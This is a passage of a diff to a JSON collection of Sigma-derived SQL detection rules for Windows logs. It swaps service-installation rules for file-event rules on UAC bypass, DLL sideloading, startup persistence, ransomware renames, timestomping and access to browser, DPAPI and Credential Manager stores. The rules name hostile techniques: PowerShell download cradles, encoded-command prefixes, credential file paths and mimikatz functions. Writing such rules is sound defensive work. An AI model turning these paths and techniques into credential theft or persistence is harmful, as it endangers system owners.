'%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "status": "experimental", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Application installation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_rename_win_not_dll_to_dll.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate use of the tool" + "Backup software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_rename_win_ransomware.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((NewProcessName = 'System' AND ParentProcessName = 'Idle') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": 